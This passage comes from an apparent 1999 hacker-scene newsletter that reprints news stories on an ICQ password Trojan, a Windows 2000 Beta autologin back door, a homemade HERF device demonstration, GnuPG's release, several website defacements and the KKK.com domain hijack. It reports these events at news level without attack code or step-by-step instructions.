Online Trojan Horse Hits ICQ Passwords are compromised for about 200 users of the lead instant-messaging suite. by Jack McCarthy, IDG News Service September 10, 1999, 3:34 a.m. PT A hacker using a Trojan Horse disguised as a JPEG file has gained access to a small number of ICQ passwords, an America Online official said on Thursday. Only about 200 ICQ passwords have been compromised out of a subscriber base of more than 40 million people, according to Regina Lewis, a spokesperson for the ICQ messaging service, which is owned by AOL. However, ICQ will issue new passwords to those people within 24 hours, Lewis said. New passwords can also be obtained by e-mailing ICQ at support@icq.com, she added. Access to the passwords was gained when ICQ subscribers received an e-mail with an attachment for an executable file. When the attachment was launched, the ICQ password was automatically exposed. The hacker used e-mail addresses picked up from commonly-available ICQ directories and message boards, Lewis said. "It's pretty straightforward e-mail hacking," Lewis said. "It's password fishing." Lewis recommended that subscribers do not open attachments in e-mails from unknown sources. The origin of the Trojan Horse, which is a malicious program masquerading as a benign application, had not been traced by late Thursday, although efforts were underway to find the source, according to Lewis. @HWA 32.0 BackDoor in Windows Found ~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com contributed by evil wuench A real back door has been found in Windows 2000 Beta 3. MS said it knew about the hole back in April and that approximately 650,000 systems could be at risk. The problem is based in the 'autologin' account that is automatically created for users who are not connected to a domain. If the telnet server is active, which can be done remotely with Visual Basic commands, a malicious attackers could login through this account and have complete control over the system. ZD Net http://www.zdnet.com/zdnn/stories/news/0,4586,2331412,00.html -------------------------------------------------------------- This story was printed from ZDNN, located at http://www.zdnet.com/zdnn. -------------------------------------------------------------- A real Windows back door By David Raikow, Sm@rt Reseller September 9, 1999 12:58 PM PT URL: http://www.zdnet.com/zdnn/stories/news/0,4586,2331412,00.html Amid all the spurious hype about the supposed "NSA Back Door" in Windows NT, a real and very dangerous security breach in some builds of Windows 2000 Beta 3 has gone almost unnoticed. In an e-mail circulated Monday, David Litchfield of security consultancy Arca Systems Inc. described a simple technique that would give an attacker full access to a susceptible machine. Microsoft (Nasdaq:MSFT) acknowledges it was aware of the breach within days of shipping Windows 2000 Beta 3 in April. The breach will be disabled in its Release Candidate 2 build, which Microsoft could release next week. While not the final release of Windows 2000, Beta 3 is the most widely circulated build, and one which Microsoft sold to interested testers and got certain OEMs to agree to preload on new systems. Microsoft claims that more than 650,000 testers are working with the build and the subsequent release candidates which Beta 3 testers receive. Autologin the culprit The Windows 2000 security problem stems from an "autologin" feature that Microsoft incorporated into the initial Beta 3 release. On machines not connected to a domain -- including the vast majority of home users -- affected versions of the Windows 2000 installer automatically create an "autologin" account based on the user's software registration information. This account has administrative privileges on the system and has no password. By itself, this feature presents little problem unless an attacker can get physical access to the machine in question. If the Telnet server built into Windows 2000 is active, however, an attacker could use a nbtstat command to find the autologin account user name, and log in with complete control over the computer. Even worse, the Telnet server can be covertly activated by a simple Visual Basic script hidden in any HTML document. Scott Culp, Microsoft security manager for NT, acknowledged that the autologin feature had presented a threat, but said that it had been removed in recent builds. He was unable to provide the precise build number in which autologin was removed. "This was an option intended to allow users with good physical access to their hardware a simplified login process, but our security team quickly recognized the problems involved and insisted on its removal," said Culp. '... Not ready to ship' "It's important to remember that this is a beta product, and not ready to ship. Finding these kinds of problems is what the beta process is all about." Culp also acknowledged that a remote user could start the Windows 2000 Telnet server. While this bug in itself has serious security implications, he insisted that the removal of the autologin feature had rendered it useless to an attacker. "The attack requires an account with a known name and password, but ... we've already implemented changes that prevent that," he said. The "autologin" feature was implemented in Microsoft Windows Beta 3, and will not exist in the forthcoming Release Candidate 2. According to Microsoft, the feature was altered to prompt users for a password in Release Candidate 1, which they released to testers in July. Additional reporting by Will Knight, ZDNet UK, and Mary Jo Foley, Sm@rt Reseller. @HWA 33.0 HERF Gun Demonstrated at InfowarCon ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com contributed by Code Kid At the Infowar Conference held Wednesday in Washington DC a California engineer demonstrated a High Energy Radio Frequency Weapon capable of remotely disrupting computers, automobiles, medical equipment and other electronic devices. The demonstration was done with $500 worth of spare parts assembled from a local electronics store. (Until I see a demonstration that has a range of over 300 meters or a 'blast' radius of over 25 meters I'm not going to get too worried about this technology. While numerous people have claimed such weapons exists they are either classified or otherwise shrouded in secrecy. A 30 meter range does not constitute a viable weapon.) ZD Net http://www.zdnet.com/zdnn/stories/news/0,4586,2331772,00.html -------------------------------------------------------------- This story was printed from ZDNN, located at http://www.zdnet.com/zdnn. -------------------------------------------------------------- Zap! ... and your PC's dead By Kevin Poulsen, ZDNN September 9, 1999 5:44 PM PT URL: http://www.zdnet.com/zdnn/stories/news/0,4586,2331772,00.html?chkpt=hpqs014 WASHINGTON -- With $500 and a trip to the hardware store, saboteurs can build a device capable of remotely disrupting computers, automobiles, medical equipment and nearly anything else dependant on electronics, according to a California engineer who demonstrated a homebrew computer death-ray at the InfowarCon '99 conference here Wednesday. Former Navy engineer David Schriner showed off an unwieldy device constructed from a parabolic reflector, a horn antenna and two automotive ignition coils, which he aimed at two personal computers about 20 feet away. When an assistant activated the Rube Goldberg contraption by connecting it to a car battery, the conference room filled with a loud buzzing from the PA system and a PowerPoint presentation on the projection screen flickered and scattered. One of the computers instantly dropped out of its screen saver. When the device was switched off, both PCs were frozen, and wouldn't respond to keyboard input. HERF emissions a killer The effects of High Energy Radio Frequency (HERF) emissions on electronics are well known among engineers, and info-warriors have expressed concern that adversarial nations may someday include computer-killing devices in their arsenals. Military aircraft are built with hardened electronics designed to survive the electromagnetic pulse created by a nuclear detonation. Schriner theorized that a single nuclear weapon designed specifically for the purpose, "would probably take out all of the electronics on the East Coast." But Schriner, who has devoted his research to small-scale electronic warfare, said the demonstration was intended as a "wake up call" to show that even low-budget saboteurs can create viable electronic weapons. Wal-Mart-powered weapon "We bought the car battery at Wal-Mart yesterday," said Schriner. "It's all stuff you can buy at the hardware store." The HERF gun is not particularly high-tech, either. The device uses technology dating back to Tesla, essentially pushing a 20 megawatt burst of undisciplined radio noise through an antenna. The energy is enough to interfere with sensitive computer components nearby, creating unpredictable results ranging from minor anomalous behavior, to complete burnout. Schriner said he's built larger HERF guns capable of crashing computers and disabling automobiles at a range of 100 feet, with a cost as low as $300. That's going in the script Jonathan Lemkin, a screenwriter working on an infowar script for Paramount, was particularly impressed with the dramatic display and menacing hardware. "That's definitely going in the movie," he said. The computers targeted in today's demonstration worked fine after rebooting, and Schriner said permanent damage is uncommon. "But if that happens to be a computer in a tank, or in a piece of medical equipment, how long does it take to reboot? . . . By that time you could be dead." Conference organizer and infowar author Winn Schwartau said Wednesday's demonstration validates a threat he first tried to warn Congress about in 1991. "They asked if I thought they should add HERF guns to the Brady Bill," Schwartau recalls. @HWA 34.0 GNU Launches Free Encryption Tool ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com contributed by Weld Pond As a replacement for the now commercial PGP, GNU software has released GNU Privacy Guard (GnuPG) version 1.0.0. Since the software was developed outside the US, does not contain any patented algorithms and is in the public domain the software does not come under control of US export restrictions or the Wassenaar agreement. GnuPG features 128 bit encryption, support for a key expiration date, and comes in eight different languages. It was originally written for GNU/Linux, FreeBSD and OpenBSD systems, and has recently been ported to Windows. GNU Privacy Guard http://www.gnupg.org/ Free Software Foundation http://www.fsf.org/ CNN http://www.cnn.com/TECH/computing/9909/09/gnupg.idg/index.html CNN; GNU launches free encryption tool September 9, 1999 Web posted at: 12:52 p.m. EDT (1652 GMT) by Douglas F. Gray From... (IDG) -- Open-source software group GNU on Tuesday announced the release of its message-encryption tool GNU Privacy Guard (GnuPG) version 1.0.0. The privacy-protection program, which is available now, is billed as a replacement for PGP (Pretty Good Privacy) protection. Because GnuPG does not use patented algorithms such as IDEA (International Data Encryption Algorithm), as well as the fact that it was developed outside of the U.S., it is not subject to export restrictions as PGP is, the group said. "This was all developed outside the U.S., and that was done deliberately so GnuPG could be distributed both inside and outside the U.S.," according to Brian Youmans, distribution manager at the Free Software Foundation, Inc. (FSF), which was originally created to support the GNU Project. According to the GnuPG Web site, the software is not controlled by the Wassenar agreement either, because it is in the public domain. The Wassenar agreement was signed in December 1998 by 33 countries to put export controls on some types of encryption software. "The (encryption) project is not a formal project of the Foundation itself, and we didn't actually pay anyone to work on it, but we are certainly very glad it happened," Youmans stated. He added that if the FSF had paid anyone, it could possibly have broken the "created outside the U.S." rule which is needed to avoid export restrictions. Tuesday's release of GnuPG is the first "fully functional production release," according to Youmans, but the application has been beta tested in different pre-production versions for over a year. Like PGP, GnuPG uses 128-bit encryption. It was created by Werner Koch, a software developer based in Germany. A beta version of the product was released in January. GnuPG also features a number of security enhancements, including support for a key expiration date, support in eight languages and an online help system. Privacy Guard works on GNU/Linux, FreeBSD and OpenBSD systems, and although it was not written with Microsoft Corp.'s Windows and Windows NT systems in mind, it has been ported to those systems with positive results, according to Youmans. The GNU Project, based in Boston, Massachusetts, was launched in 1984 to develop a free Unix-like operating system, called GNU/Linux. @HWA 35.0 Fringe Goes Offline ~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com contributed by White Vampire The popular web site 'Fringe of the Web' has decided to shut down after a year in operation. FoW was a popular underground web site ranking page that allowed people to rank web sites based on which ones they visited. This is the second time the FoW has been decommissioned, the first time was back in 1996. The admin of the site RSnake says he will probably leave the scene. Project Gamma http://www.projectgamma.com/news/archive/1999/september/090999-2328.html The Fringe is no more, at least for now September 9, 1999, 23:25 Author: WHiTe VaMPiRe The Fringe of the Web was created by Bronc Buster at some point in 1994, and was one of the first Webrings. The ring lasted until approximately 1996; Bronc Buster brought it down due to degradation in the scene, and continued on with other projects. The Fringe was no more.. ...At least until early 1998. RSnake resurfaced The Fringe of the Web to "make a kick-ass website," as he put it. This evolution of The Fringe was a Top site list, as RSnake felt it was best to place "relevance higher according to the amount of traffic flowing to it." He wanted to provide a resource to find other Web sites that were still up, operational, and had good quality content. That was going great until a few days ago. The Fringe of the Web, is once again, no more. At least for now, until somebody else brings back the legacy. RSnake decided to take down The Fringe of the Web due to lack of participation from other programmers, lack of time, and lack of resources. The Fringe of the Web's domain, Webfringe.com, is currently redirected to another Web site. RSnake wanted to make the following known: I only want known that I tried my very best to get kids to learn something. I provided no files or warez on the website itself et al. People asked how I learned and I will tell you, I put up a little website that had a few hundred hits a day, and made an open invitation to answer any questions anyone had. Most of the time I didn't know the answer, but that's the thing about the Internet. Go to a page like www.startfrom.com/linux and start surfing. If you ask a search engine the right questions, you are guaranteed to get the right answer. I lost a lot of faith with all the people who randomly came into #webfringe on irc.webmaster.com because they were unwilling (not unable) to learn. A few good kids came out knowing a lot about programming (Parasitic for one), but most were much more interested in finding their script to nuke some poor clueless kiddy. I don't know, there's just something wrong when 80% of the people who enter a hacking channel want only to know how to run a remote system administration tool (BO) or read someone's hotmail account, and they think that's the world of hacking. Maybe I'm an idealist, but I wanted people to learn. I didn't do it for the glory; I did it for the love. It's hard to do something for so long and get nothing from it. I regret that it has to go down in its current format, but I am glad a few greatly benefited from it. Major props to Bronc Buster (for the FOTW name), Tattooman (for the late night talks when I was down), Parasitic (for the help on FOTW good luck in college bro, I wish you the best), SpeedyGrl & P4nd0r4 & Jezzabelle & LDJ & MidnightStarz (for being rad libidinous haX0r b4b3s), Silicon Toad (for being my inspiration and a great guy), Team Catharsys ;) (for kicking some ass), and the rest of the people I am forgetting. Where is RSnake going from here? He did not want to discuss what was going on in his personal life, however, he did say, "I think the name RSnake is a thing of the past, I'm not going to disappear, I am just moving to a point where I can't see myself working on hacking sites anymore." Relevant Links: The Fringe of the Web (Redirected to another site) http://www.webfringe.com/ @HWA 36.0 IACSP Defaced ~~~~~~~~~~~~~ From HNN http://www.hackernews.com contributed by wanker The web site for the International Association for Counterterrorism and Security Professionals has been defaced for the second time in one week. Computer Currents http://www.currents.net/newstoday/99/09/09/news2.html HNN Cracked Pages Archive http://www.hackernews.com/archive/crackarch.html Daily News Cracker's Hits A Second Time By Bob Woods, Newsbytes. September 09, 1999 A group of crackers calling itself the "un1x b0wling t34m" (Unix bowling team) or "b0wl3rz" (bowlerz) infiltrated a Website associated with the International Association For Counterterrorism & Security Professionals (IACSP) for the second time in a week. In the letter-and-number style of most crackers, the group wrote, "th3 m1ndl3ss 4buz3 4nd 1nt1m1d4t10n 0f c0unt3rz muzt b3 st0pp3d 4t 4ll c0zts" (Translation: The mindless abuse and intimidation of counterz must be stopped at all costs). "0rg4n1z4t10nz such 4s th3 1nt3rn4t10n4l 4ss0c14t10n f0r c0unt3r t3rr0r1zm 4r3 s4d1st1c g0dl3ss b4st4rdz wh0 g41n 0rg4sm1c pl34sure fr0m the suff3r1ng 4nd t0rm3nt 0f d3f3nc3l3zz cgi skr1ptz" (Organizations such as the International Association for Counterterrorism are sadistic godless bastards who gain orgasmic pleasure from the suffering and torment of defenseless cgi (common gateway interface) scripts). "th3 un1x b0wl1ng t34m c4nn0t st4nd 1dly by 4nd l3t th1z h4pp3n. Th3r3f0re, w3 4r3 br1ng1ng the ruckuz t0 4ll y0u m0th3rf****" (The Unix bowling team cannot stand idly by and let this happen. Therefore, we are bringing the ruckus to all you "expletive deleted"). Also on the defaced site was a picture of three tour buses with the name "Lamers" painted on all of them. IACSP officials were not available for comment by Newsbytes' late- edition deadline. Last Friday, the b0wl3rz hit IACSP's SecurityNet.net site, which provides professionals in the law enforcement, military, government, and corporate security industry an "intelligence network that will provide the necessary tactical and educational information to prepare and hopefully deter terrorism in all of its forms in the fast approaching 21st century," the site said. The cracked SecurityNet.net site said last week said: "0h d34r. dubyadubyadubya securitynet dot net? y0u bezt loq d0wn ur s*** in c4ze those n4sty UB0wl3rz c0me kn0ck1n" (Oh, dear. www.securitynet.net? You best log down your expletive deleted in case those nasty Ubowlers come knockin). Besides the two IACSP sites, the b0wl3rz have hit at least four other sites in September, according to the Attrition Website, (http://www.attrition.org ), which among other things provides a mirror record of infiltrated Websites. A copy of the defaced IACSP site is available at the Attrition site. Additionally, b0wl3rz issued a thinly veiled threat in the note left last week at the cracked SecurityNet.net site: "com1ng soon from b0wlerz - wingsgi.gsfc.nasa.gov (apparently associated with NASA's Goddard Space Flight Center) and www.mormon.com!" As of the Newsbytes late-edition deadline today, it appears neither site had been cracked. Regarding the threats to NASA and the Mormon sites, Steve Fustero, president of the Arlington, Va.-based International Association For Counterterrorism & Security Professionals, told Newsbytes last week, "They want to show they have some muscle and show they can get into other sites." IACSP's Website is at http://www.iacsp.com . @HWA 37.0 RUSSIAN HACKERS REPORTEDLY ACCESSED US MILITARY SECRETS ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From Help Net Security http://www.net-security.org/ by Thejian, Sunday 12th September 1999 on 11:00 pm CET Russian hackers broke into U.S. government computers and may have snatched classified naval codes and information on missile systems, Newsweek reported in its latest issue. The weekly, quoting intelligence sources, said the suspects were elite cyber-spooks from the Russian Academy of Sciences, a government-backed organization which works with Russia's leading military laboratories. Newsweek quoted one Pentagon official as saying this was "a state-sponsored Russian intelligence effort to get U.S. technology," adding it was apparently the first such attempt by Moscow. It further quoted Deputy Defense Secretary John Hamre as saying: "We're in the middle of a cyber war." Nando Times; http://www.techserver.com/noframes/story/0,2294,92270-146247-1027890-0,00.html Russian hackers reportedly accessed U.S. military secrets Copyright © 1999 Nando Media Copyright © 1999 Agence France-Press From Time to Time: Nando's in-depth look at the 20th century WASHINGTON (September 12, 1999 2:03 p.m. EDT http://www.nandotimes.com) - Russian hackers broke into U.S. government computers and may have snatched classified naval codes and information on missile systems, Newsweek reported in its latest issue. The weekly, quoting intelligence sources, said the suspects were elite cyber-spooks from the Russian Academy of Sciences, a government-backed organization which works with Russia's leading military laboratories. The hackers targeted computer systems at the Defense and Energy Departments, military contractors and leading civilian universities. Pentagon officials, describing the intrusions as "sophisticated, patient and persistent," said they began in January and were almost immediately detected by U.S. security agents who traced them back to computers in Russia and developed counter-measures, according to Newsweek. But the cyber-spies were said to have quickly developed new tools that allowed them to penetrate undetected, although they at times left behind electronic traces. Newsweek quoted one Pentagon official as saying this was "a state-sponsored Russian intelligence effort to get U.S. technology," adding it was apparently the first such attempt by Moscow. The weekly said Washington had not yet protested to Moscow but quoted Deputy Defense Secretary John Hamre as saying: "We're in the middle of a cyber war." It said the security breach was so serious that the Pentagon had ordered its civilian and military employees to change their computer passwords, the first time such a step has been taken. @HWA 38.0 NET PRIVACY STUDY INCLUDED IN RD BILL ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com by Thejian, Sunday 12th September 1999 on 10:50 pm CET The House Science Committee Thursday voted 41-0 to approve the $4.8 billion federal research fund that includes an amendment calling for a study on ways to increase online privacy protections. The amendment calls for a study into what technology must be developed to improve Internet privacy; address current public/private plans for deploying privacy technology, standards and policies; and address international privacy protection policies. http://www.32bitsonline.com/news.php3?news=news/199909/nb199909096&page=1 Net Privacy Study Included In R&D Bill By: Robert MacMillan Newsbytes. Date: 09/10/99 Location: WASHINGTON, DC, U.S.A. Some technology groups have praised Thursday's House Science Committee markup of a bill that promotes federal research grants, and that also calls for a comprehensive online privacy study, though at least one industry representative has taken a dim view of the study. The House Science Committee Thursday voted 41-0 to approve the $4.8 billion federal research fund that includes an amendment calling for a study on ways to increase online privacy protections. "We have a very robust development effort underway throughout the industry to do this without more government studies," said David McClure, executive director of the Association of Online Professionals. "I'm not certain what the ultimate objective of such a study will be." H.R. 2086, the Networking and Information Technology Research and Development Act, sponsored by Science Committee Chairman F. James Sensenbrenner, R-Wis., was passed unanimously with a number of minor amendments besides the privacy study. The bill could help provide an "out" to both parties looking to say they support a permanent research and development tax credit extension, especially since the five-year plan in the $792 billion GOP tax cut package is expected to suffer an ignominious fate of death by veto-threat at any time. Most of the amendments were technical in nature, some of which corrected erroneous budget requests submitted by the US Energy Department. The privacy study amendment, submitted by Rep. David Wu, D-Ore., calls on the National Science Foundation and the National Academy of Sciences's National Research Council to: find out what technology must be developed to improve Internet privacy; address current public/private plans for deploying privacy technology, standards and policies; and address international privacy protection policies. The report would be due in one year and nine months after the bill is passed into law. McClure said the bill addresses a no-win issue for people on both sides of the online privacy fence. "No matter what you do with privacy, one faction is going to claim you're too restrictive whereas the other will claim that it certainly doesn't go far enough," he said. "This is not an entreaty to say that we shouldn't do anything...but to somehow assume that the whole problem is technology...is a naive view of the market. "I am never really comfortable with these kinds of amendments which are added to bills where the initial purpose of the bill is fairly clear-cut," McClure also said. "It goes back to the whole congressional concept that if you have a little amendment that you think is going to make people choke and gag, you add it to a bill that everyone is supportive of." Wu staffers were not immediately available for comment. The overall bill authorizes $4.3 billion for high-performance computing funding across several agencies, along with $385 million for "terascale" computing and $111 million for Next-Generation Internet funding. Since the NGI project already has been authorized for fiscal year 2000, the total $4.768 billion in H.R. 2086 only includes the $111 million amount for NGI beyond that fiscal year. Taking into account the total amount of FY2000 funding for NGI, the total amount the bill authorizes would be $4.836 billion. Under the terms of the bill, $2.5 billion goes to the National Science Foundation, $1 billion goes to NASA, $566.2 million goes to the Energy Department, $62 million goes to the National Institute for Standards and Technology, $71.7 million goes to the National Oceanographic and Atmospheric Administration, and $22.3 million goes to the Environmental Protection Agency. These amounts go in part to long-term basic research grants in information and networking technology, large grants, information technology research centers, major research equipment, and other items. In the NGI funding department, the $111 million over 2001-2002 includes $50 million for the NSF, $20 million for NASA, $30 million for the Energy Department, and $11 million for NIST. "This bill offers opportunities for all," Sensenbrenner said, adding that the President's Information Technology Advisory Council also supports the bill. The bill also requires the NSF to study the availability of strong encryption products in the international market, "and how they compare with encryption technologies subject to export restrictions in the United States." The report would be due six months after the bill is signed. The bill now proceeds to the House floor for consideration. Compliments soon after the markup surfaced from the high-tech community, including the TechNet lobbying group. TechNET Chief Executive Roberta Katz in a statement praised Sensenbrenner for his support of high-technology issues. "Chairman Sensenbrenner is a tireless advocate for ensuring America's place as the technology leader," Katz said. "TechNet and its more than 140 member companies are committed to standing with the chairman as his bill goes to the full House of Representatives and to the Senate." Some Democrats, including Neal Lane, assistant to the president for science and technology, have noted with irony that Sensenbrenner has managed to earn GOP-focused praise for the party's efforts to support the high-technology community, while at the same time minimizing Democrat-based efforts in the same arena - partially by sizing down presidential technology budget requests within the appropriations bills. @HWA 39.0 SCENE RELATIONS ~~~~~~~~~~~~~~~ From Help Net Security http://www.net-security.org/ by BHZ, Sunday 12th September 1999 on 7:03 pm CET Today US Embassy in China (on chinese server) - www.usembassy-china.org.cn was defaced by Hi-Tech Hate. Defaced site looks like a copy of Level Seven cracks. They left some messages that talk against couple of crackers in the scene - "Vent you are a No-Skilled Fag. When will you admit it? .... aww poor v00d00, whats going to happen now that you've run out of sites to cold fusion?". Mirror here. http://www.attrition.org/mirror/attrition/1999/09/11/www.usembassy-china.org.cn @HWA 40.0 L0PHT HEAVY INDUSTRIES PROFILED ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From Help Net Security http://www.net-security.org/ by Thejian, Saturday 11th September 1999 on 4:45 pm CET Heh, this is kind of awkward. Here's a Business Wire profile of the L0pht "for inclusion in your files". "L0pht Heavy Industries is a world renowned computer security think tank. Founded in 1992 as a computer research facility, the L0pht has grown into a leader in the field of computer security software." Anyways, here it is. Heh.. damn right news is slow :) Friday September 10, 10:00 am Eastern Time Company Press Release Corporate Profile for L0pht Heavy Industries, dated Sept. 10, 1999 (BUSINESS WIRE)--The following Corporate Profile is available for inclusion in your files. News releases for this client are distributed by Business Wire and also become part of the leading databases and online services, including all of the leading Internet-based services. Published Date: Sept. 10, 1999 Company Name: L0pht Heavy Industries Address: P.O. Box 990857 Boston MA 02199-00857 Main Telephone Number: 617-926-4889 Internet Home Page Address (URL) www.l0pht.com Chief Executive Officer: Dr. Peter Mudge Chief Financial Officer: Sandy Halflinger Investor Relations E-mail address: admin@l0pht.com Public Relations Contact: Sandy Halflinger E-mail address: press@l0pht.com Industry: Internet Security Company Description: L0pht Heavy Industries is a world renowned computer security think tank. Founded in 1992 as a computer research facility, the L0pht has grown into a leader in the field of computer security software. The L0pht's products include L0phtCrack, the industry standard NT password auditing tool. As a result of their innovative security research, the L0pht has released dozens of computer security advisories to the Internet community, warning of dangerous vulnerabilities in today's most widely used software. Many at the L0pht are considered top experts in the computer security field and have appeared on numerous network news programs and documentaries, as well as having testified about government computer security for the U.S. Senate. Visit the L0pht's web site at http://www.l0pht.com. Contact: L0pht Heavy Industries 41.0 SUMMIT TALKS FOCUS ON E-COMMERCE SAFETY ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From Help Net Security http://www.net-security.org/ by Thejian, Saturday 11th September 1999 on 4:00 pm CET Two summits in Europe next week will bring together top executives and policy makers from around the world to discuss how to make e-commerce safer for consumers and merchants. Topics will be ranging from ensuring that customer data remains confidential to preventing theft of music and movies transmitted over the Net. So what you may say, but this is important and could set the ground rules for the dealing with (personal) information, security and privacy problems etc in the future. Read more on it here. Summit talks focus on e-commerce safety By Dan Goodin Staff Writer, CNET News.com September 10, 1999, 12:50 p.m. PT Two summits in Europe next week will bring together top executives and policy makers from around the world to discuss how to make e-commerce safer for consumers and merchants. Commerce Secretary William Daley, Silicon Graphics chief executive Robert Bishop, and Time Warner chief executive Gerald Levin, among others, will speak at the two conferences on an array of topics--ranging from ensuring that customer data remains confidential to preventing theft of music and movies transmitted over the Net. With e-commerce generating billions of dollars in revenues--and projected to grow in the coming years--there is increasing pressure on policy makers and company executives to establish a legal framework that fits the new economy. Historically, the United States and the European Union have not seen eye to eye on issues surrounding e-commerce. Recently, the two hit a stalemate over the practice of exempting U.S. Web sites from strict new privacy laws that prevent the collection of European Internet users' personal information. That conflict, however, is not on the agenda of either conference. "There's no doubt that e-commerce is going to be the engine for economic growth in the next 10 to 20 years, and getting the rules right to ensure that governments don't create impediments is extremely important," said Neil Turkewitz, executive vice president of the Recording Industry Association of America, a trade group that represents the major U.S. record companies. Simplifying global e-commerce The first conference, sponsored by the Global Business Dialogue on Electronic Commerce, will take place on Monday in Paris. Chief on the agenda is encouraging the international community to ratify treaties passed in late 1996 by the World Intellectual Property Organization (WIPO), a body affiliated with the United Nations that helps coordinate patent and copyright laws throughout the world. So far, only about ten nations, including the United States, have ratified the WIPO treaties, which essentially set up ways to enforce intellectual property rights in cyberspace. Thirty countries must ratify the measure for it to take effect. The conference also will cover ways to foster wider adoption of e-commerce among consumers, including the following: - Establishing an international forum similar to the Better Business Bureau that can mediate disputes between customers and online businesses, particularly when the parties are located in separate countries. - Extending a moratorium on tariffs placed on goods sold online when the customer is in one country and the seller is in another. - Helping to prevent security breaches. "For this market to take off, you've got to have a lot stronger feeling by consumers that this is a safe, well-lighted marketplace," said Scott Cooper, manager for technology policy at Hewlett-Packard, which will be participating in the forum. Time Warner's Levin will speak on several panels, as will Sanford Litvack, a senior executive vice president at Walt Disney. Government officials from France and Canada also plan to participate. Securing rights online The second conference, which takes place Tuesday through Thursday in Geneva, is sponsored by WIPO, and is expected to draw about 600 attendees, a WIPO official said. It is focused more closely on helping content owners police their rights online. "What people use the Internet for is to look at copyrighted materials," said Tod Cohen, vice president and counsel for new media at the Motion Picture Association of America and a participant at the WIPO conference. "As [the Internet] expands internationally, there's no doubt there will be international needs to meet." Since passing the copyright treaties, most of WIPO's Internet-related work has focused on eliminating "cybersquatting," the practice of registering domain names containing popular business names and then selling them at an inflated price. The Internet Corporation for Assigned Names and Numbers (ICANN), appointed by the Clinton Administration to oversee key Net policy, is now considering the proposal. For its part, the Motion Picture Association of America also is seeking a spot on the ICANN board of directors. Other speakers at the conference include Andreas Schmidt, chief executive of AOL Europe; Hilary Rosen, chief executive of the Recording Industry Association of America; Esther Dyson, interim chair of ICANN; and government officials from the United States and the European Union. @HWA 42.0 SECURITY SOLUTIONS ~~~~~~~~~~~~~~~~~~ From Help Net Security http://www.net-security.org/ by BHZ, Saturday 11th September 1999 on 2:04 am CET Content Technologies (www.mimesweeper.com), creators of content-checking software called MIMESweeper and anti virus firm Command Software (www.commandcom.com) merged into alliance to offer Internet service providers complete security service. http://www.technologypost.com/enterprise/DAILY/19990910104525384.asp?Section=Main ENTERPRISE Content Technology and Command Software team up on anti-virus service NEWSBYTES Content Technologies, the firm behind the MIMESweeper content-checking software, has teamed up with Command Software, the anti-virus firm, to offer Internet service providers (ISPs) a complete information technology (IT) security service. The linkup is billed as unique in the IT security business and will, the two companies say, allows Internet service providers to offer a secure Internet environment to their users. Many ISPs already routinely scan inbound e-mail for their subscribers against such problems as viruses and Trojan horse programs. Almost none provide content checking services which probe "zipped" or similarly compressed attachments for similar problems. Susan Majeris, a spokesperson for Content Technologies, said that the partnership with Command Software will help ISPs differentiate themselves in what many view as a commodity market. By offering value-added services, she said, ISPs take an important step toward becoming application service providers (ASPs) - an emerging, high-growth niche for fully hosting applications. Peter Kershaw, Content Technologies' president, said that the alliance also gives ISPs the ability to process and manage higher volumes of e-mail and quarantine e-mail threats in a central location. Under the new service, these functions are pre-integrated for ISPs and can be seamlessly rolled out to customers. According to Kershaw, when the Melissa virus hit, people probably read about the e-mail downtime experienced by companies such as Boeing and Microsoft - large companies that host their own e-mail. "Imagine all of the damage done to companies that rely on ISPs for e-mail hosting. Companies shouldn't have to wait until a virus has penetrated their network to try to stop it," he said. "Our alliance with Command gives ISPs a way to protect their customers at the gateway, a powerful service that will save their customers a lot of money." Content Technologies and Command have already signed up their first customer ISP to the E-mail Command service - CyPost, an ISP serving Portland, Seattle, and Canada. Other ISPs are expected to offer the service to their customer later this year. Copyright (c) Post-Newsweek Business Information, Inc. All rights reserved. @HWA 43.0 HTTP://WWW.KKK.COM HIJACKED ~~~~~~~~~~~~~~~~~~~~~~~~~~~ From Help Net Security http://www.net-security.org/ by Thejian, Friday 10th September 1999 on 11:00 pm CET Last week, someone redirected a Ku Klux Klan Web site to that of an anti-hate group. Hacking the mailbox of one of the contacts registered with Network Solutions the perpetrator updated the domain name server name information to a free redirection service and from there to the anti-hate Web site. The article also features some comments from Bronc Buster on how a bit of social engineering at Network Solutions is gets used more and more often by people trying to get a point through. http://www.wired.com/news/print_version/culture/story/21687.html?wnpg=all Wired; Ku Klux Klan Korrected by James Glave 12:00 p.m. 10.Sep.99.PDT To the satisfaction of many, it was a klansman's worst nightmare. K.A. Badynski woke up one day last week and found his Ku Klux Klan Web site hijacked. Visitors seeking white pride information were instead automatically sent to an organization devoted to fighting online bigotry. "The domain was stolen," said Don Black, the director of the Stormfront, a white power site. Stormfront hosts images for KKK.com. "I gather someone may have hacked an email address of one of the contacts listed in the [Network Solutions] domain name database," Black said. But the director of anti-hate group HateWatch said his organization had nothing to do with the redirect. "This type of action, hacktivism, is not only [against] the First Amendment but it also takes away one of the greatest civil rights tools we have -- using the words of bigots against them," HateWatch director David Goldman said. Goldman said that the start of the redirect coincided with comments he made against hacktivism -- politically motivated hacking and cracking -- in the Village Voice. Goldman denied responsibility, suggesting that a white-power supporter may have tried to discredit his organization. Stormfront's Black questioned how seriously authorities would investigate the incident, and pointed the finger right back at Goldman. "One of his supporters did it," Black said. Whoever redirected the KKK.com site undertook an elaborate series of steps that began with a falsified Network Solutions domain-name change form. Network Solutions verifies changes as legitimate by sending an automated email to the registered owner of the domain. The unknown hacktivist managed to subvert that not-so-secure security measure and update the domain name server information to a company called VDirect. The perpetrator then set up an account with VDirect -- again, an automated process -- to send those looking for KKK.com to HateWatch. VDirect computers confirmed that VDirect was then registered as the owner of the KKK Web servers and dutifully completed the free transaction. VDirect co-founder Rick Harby said he tried to remove the redirect Thursday when David Goldman filed a formal complaint. By that time, however, he said the perpetrator had already repeated the stunt, redirecting the servers to the domain cmchost.com. That domain is not registered with Network Solutions, which could not be reached for comment. The KKK.com site was working as of Friday. Whatever the reason, the redirect stayed in place for almost a full week. Badynski, KKK.com's webmaster, could not 